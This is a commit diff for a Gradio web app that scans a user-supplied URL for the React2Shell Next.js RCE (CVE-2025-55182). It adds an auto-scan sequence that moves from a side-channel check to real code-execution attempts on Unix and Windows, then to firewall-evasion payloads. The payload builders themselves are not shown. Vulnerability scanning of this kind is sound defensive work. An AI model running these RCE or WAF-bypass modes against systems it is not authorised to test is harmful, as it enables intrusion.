Spaces:

blazingbunny
/

react2shell-checker

Sleeping

App Files Files Community

blazingbunny commited on Dec 8, 2025

Commit

19d4d50

verified ·

1 Parent(s): 16810dd

Update app.py

Browse files

Files changed (1) hide show

app.py +118 -59

app.py CHANGED Viewed

@@ -6,6 +6,7 @@ import string
 import json
 from urllib.parse import urlparse
 from requests.exceptions import RequestException
 # --- Core Scanner Logic ---
@@ -149,28 +150,29 @@ def is_vulnerable_rce_check(response: requests.Response) -> bool:
     redirect_header = response.headers.get("X-Action-Redirect", "")
     return bool(re.search(r'.*/login\?a=11111.*', redirect_header))
-# --- Gradio Interface Logic ---
-def scan_target(url, safe_check, windows_mode, waf_bypass, vercel_bypass, custom_path):
-    if not url:
-        return "Error: Please enter a URL."
     host = normalize_host(url)
     timeout = 10
     verify_ssl = True
     if safe_check:
         body, content_type = build_safe_payload()
         check_func = is_vulnerable_safe_check
-        mode_str = "Safe Check (Side-Channel)"
     elif vercel_bypass:
         body, content_type = build_vercel_waf_bypass_payload()
         check_func = is_vulnerable_rce_check
-        mode_str = "Vercel WAF Bypass"
     else:
         body, content_type = build_rce_payload(windows=windows_mode, waf_bypass=waf_bypass)
         check_func = is_vulnerable_rce_check
-        mode_str = "Standard RCE Check" + (" (Windows)" if windows_mode else "")
     headers = {
         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Assetnote/1.0.0)",
@@ -181,87 +183,144 @@ def scan_target(url, safe_check, windows_mode, waf_bypass, vercel_bypass, custom
     }
     paths = [custom_path] if custom_path else ["/"]
-    logs = []
-    logs.append(f"Target: {host}")
-    logs.append(f"Mode: {mode_str}")
-    vulnerable_found = False
     for path in paths:
         if not path.startswith("/"): path = "/" + path
         target_url = f"{host}{path}"
-        logs.append(f"\nTesting: {target_url}")
         resp, error = send_payload(target_url, headers, body, timeout, verify_ssl)
         if error:
-            logs.append(f"Error connecting: {error}")
-        elif resp:
-            logs.append(f"Status: {resp.status_code}")
-            if check_func(resp):
-                vulnerable_found = True
-                logs.append("RESULT: [VULNERABLE]")
-                if not safe_check:
-                     logs.append(f"Redirect Header: {resp.headers.get('X-Action-Redirect')}")
-                return "\n".join(logs)
-            else:
-                logs.append("Result: Not Vulnerable")
-                redirect_url = resolve_redirects(target_url, timeout, verify_ssl)
-                if redirect_url != target_url:
-                    logs.append(f"\nFollowing redirect to: {redirect_url}")
-                    resp_red, error_red = send_payload(redirect_url, headers, body, timeout, verify_ssl)
-                    if resp_red:
-                        logs.append(f"Status: {resp_red.status_code}")
-                        if check_func(resp_red):
-                            vulnerable_found = True
-                            logs.append("RESULT: [VULNERABLE]")
-                            return "\n".join(logs)
-                        else:
-                            logs.append("Result: Not Vulnerable")
-    final_status = "[VULNERABLE]" if vulnerable_found else "[NOT VULNERABLE]"
-    logs.append(f"\nFinal Status: {final_status}")
-    return "\n".join(logs)
 # --- UI Setup ---
-# Guide Content in Markdown
 guide_content = """
-### 📋 Recommended Workflow
-1. **Safe Check (Start Here):** Non-destructive. Checks for side-channel indicators without executing code.
-2. **Standard RCE:** If Safe Check is inconclusive, use this to attempt actual code execution (Safe Check must be OFF).
-3. **Windows Mode:** If target is Windows-based and Standard RCE failed.
-4. **WAF Bypass:** If you receive `403 Forbidden` errors.
-### ℹ️ Mode Definitions
 * **Safe Check:** Triggers a specific 500 error digest to confirm vulnerability without RCE.
-* **Windows Mode:** Uses PowerShell payload (`powershell -c ...`) instead of Unix shell.
-* **Generic WAF Bypass:** Pads the request with junk data to push payload past WAF inspection limits.
-* **Vercel WAF Bypass:** Uses a specific multipart structure to bypass Vercel-specific defenses.
 """
 with gr.Blocks(title="React2Shell Scanner") as demo:
     gr.Markdown("# React2Shell Scanner (CVE-2025-55182)")
     gr.Markdown("Web-based scanner for React Server Components / Next.js RCE.")
-    with gr.Accordion("📖 Help & Usage Guide", open=False):
         gr.Markdown(guide_content)
     with gr.Row():
         url_input = gr.Textbox(label="Target URL", placeholder="https://example.com")
         path_input = gr.Textbox(label="Custom Path (Optional)", placeholder="/_next", value="")
     with gr.Row():
-        safe_check = gr.Checkbox(label="Safe Check", value=True, info="Side-channel check (Non-destructive).")
-        windows_mode = gr.Checkbox(label="Windows Mode", value=False, info="Use PowerShell payload.")
-        waf_bypass = gr.Checkbox(label="Generic WAF Bypass", value=False, info="Add junk data padding.")
-        vercel_bypass = gr.Checkbox(label="Vercel WAF Bypass", value=False, info="Specific structure for Vercel.")
-    scan_btn = gr.Button("Scan Target", variant="primary")
-    output_box = gr.Textbox(label="Scan Output", lines=10)
-    scan_btn.click(
-        fn=scan_target,
         inputs=[url_input, safe_check, windows_mode, waf_bypass, vercel_bypass, path_input],
         outputs=output_box
     )

 import json
 from urllib.parse import urlparse
 from requests.exceptions import RequestException
+import time
 # --- Core Scanner Logic ---
     redirect_header = response.headers.get("X-Action-Redirect", "")
     return bool(re.search(r'.*/login\?a=11111.*', redirect_header))
+# --- Orchestrator & Logic ---
+def perform_single_scan(url, mode_config, custom_path):
     host = normalize_host(url)
     timeout = 10
     verify_ssl = True
+    # Unpack config
+    safe_check = mode_config.get("safe_check", False)
+    windows_mode = mode_config.get("windows_mode", False)
+    waf_bypass = mode_config.get("waf_bypass", False)
+    vercel_bypass = mode_config.get("vercel_bypass", False)
+    mode_name = mode_config.get("name", "Unknown Mode")
     if safe_check:
         body, content_type = build_safe_payload()
         check_func = is_vulnerable_safe_check
     elif vercel_bypass:
         body, content_type = build_vercel_waf_bypass_payload()
         check_func = is_vulnerable_rce_check
     else:
         body, content_type = build_rce_payload(windows=windows_mode, waf_bypass=waf_bypass)
         check_func = is_vulnerable_rce_check
     headers = {
         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Assetnote/1.0.0)",
     }
     paths = [custom_path] if custom_path else ["/"]
+    log_lines = []
+    found_vuln = False
     for path in paths:
         if not path.startswith("/"): path = "/" + path
         target_url = f"{host}{path}"
+        # Test 1: Direct
         resp, error = send_payload(target_url, headers, body, timeout, verify_ssl)
         if error:
+            log_lines.append(f"  [{mode_name}] Connection Error: {error}")
+            continue
+        if resp and check_func(resp):
+            return True, [f"  [{mode_name}] HIT! Vulnerable on {target_url} (Status: {resp.status_code})"]
+        # Test 2: Redirect
+        redirect_url = resolve_redirects(target_url, timeout, verify_ssl)
+        if redirect_url != target_url:
+            resp_red, error_red = send_payload(redirect_url, headers, body, timeout, verify_ssl)
+            if resp_red and check_func(resp_red):
+                 return True, [f"  [{mode_name}] HIT! Vulnerable on Redirect {redirect_url} (Status: {resp_red.status_code})"]
+    return False, [f"  [{mode_name}] Not Vulnerable"]
+def manual_scan_wrapper(url, safe_check, windows_mode, waf_bypass, vercel_bypass, path_input):
+    """Wrapper for the manual scan button"""
+    config = {
+        "name": "Manual Scan",
+        "safe_check": safe_check,
+        "windows_mode": windows_mode,
+        "waf_bypass": waf_bypass,
+        "vercel_bypass": vercel_bypass
+    }
+    is_vuln, logs = perform_single_scan(url, config, path_input)
+    final_res = "\n".join(logs)
+    if is_vuln:
+        final_res += "\n\n🚨 FINAL STATUS: [VULNERABLE] 🚨"
+    else:
+        final_res += "\n\nFinal Status: [Not Vulnerable] (Check settings or try Auto-Scan)"
+    return final_res
+def auto_scan_wrapper(url, path_input):
+    """Wrapper for the Auto-Scan button that runs the sequence"""
+    if not url: return "Please enter a URL."
+    full_logs = [f"Starting Auto-Scan for: {url}\n" + "="*40]
+    # Defined Sequence of Scans
+    steps = [
+        {"name": "1. Safe Check (Side-Channel)", "safe_check": True},
+        {"name": "2. Standard RCE (Unix)", "safe_check": False, "windows_mode": False},
+        {"name": "3. Standard RCE (Windows)", "safe_check": False, "windows_mode": True},
+        {"name": "4. Vercel WAF Bypass", "vercel_bypass": True},
+        {"name": "5. Generic WAF Bypass", "waf_bypass": True}
+    ]
+    for step in steps:
+        full_logs.append(f"\nrunning {step['name']}...")
+        yield "\n".join(full_logs) # Streaming update to UI
+        is_vuln, logs = perform_single_scan(url, step, path_input)
+        full_logs.extend(logs)
+        if is_vuln:
+            full_logs.append("\n" + "="*40)
+            full_logs.append("🚨 VULNERABILITY CONFIRMED 🚨")
+            full_logs.append(f"Stopped at {step['name']}")
+            yield "\n".join(full_logs)
+            return
+    full_logs.append("\n" + "="*40)
+    full_logs.append("Auto-Scan Complete: No vulnerabilities found with standard payloads.")
+    full_logs.append("Note: Sophisticated WAFs or custom paths might still exist.")
+    yield "\n".join(full_logs)
 # --- UI Setup ---
 guide_content = """
+### 🚀 Auto-Scan Mode (Recommended)
+Just enter the URL and click **"Auto-Scan Target"**. This automatically runs the following sequence:
+1. **Safe Check:** Non-destructive side-channel check.
+2. **Standard RCE:** Tests for Linux vulnerabilities.
+3. **Windows Mode:** Tests for Windows vulnerabilities.
+4. **WAF Bypasses:** Attempts to evade firewalls (Vercel & Generic).
+*The scan stops immediately if a vulnerability is found.*
+---
+### 🛠️ Manual Mode
+Use the checkboxes below to configure a specific single test.
 * **Safe Check:** Triggers a specific 500 error digest to confirm vulnerability without RCE.
+* **Windows Mode:** Uses PowerShell payload (`powershell -c ...`).
+* **Generic WAF Bypass:** Pads the request with junk data (128KB).
+* **Vercel WAF Bypass:** Uses a specific multipart structure.
 """
 with gr.Blocks(title="React2Shell Scanner") as demo:
     gr.Markdown("# React2Shell Scanner (CVE-2025-55182)")
     gr.Markdown("Web-based scanner for React Server Components / Next.js RCE.")
+    with gr.Accordion("📖 Help & Usage Guide", open=True):
         gr.Markdown(guide_content)
     with gr.Row():
         url_input = gr.Textbox(label="Target URL", placeholder="https://example.com")
         path_input = gr.Textbox(label="Custom Path (Optional)", placeholder="/_next", value="")
+    # Auto Scan Section
     with gr.Row():
+        auto_scan_btn = gr.Button("🚀 Auto-Scan Target (Best Sequence)", variant="primary", scale=2)
+    gr.Markdown("---")
+    gr.Markdown("**Manual Configuration (Optional)**")
+    # Manual Scan Section
+    with gr.Row():
+        safe_check = gr.Checkbox(label="Safe Check", value=True)
+        windows_mode = gr.Checkbox(label="Windows Mode", value=False)
+        waf_bypass = gr.Checkbox(label="Generic WAF Bypass", value=False)
+        vercel_bypass = gr.Checkbox(label="Vercel WAF Bypass", value=False)
+    manual_scan_btn = gr.Button("Run Manual Scan", variant="secondary")
+    output_box = gr.Textbox(label="Scan Output", lines=15)
+    # Event Handlers
+    auto_scan_btn.click(
+        fn=auto_scan_wrapper,
+        inputs=[url_input, path_input],
+        outputs=output_box
+    )
+    manual_scan_btn.click(
+        fn=manual_scan_wrapper,
         inputs=[url_input, safe_check, windows_mode, waf_bypass, vercel_bypass, path_input],
         outputs=output_box
     )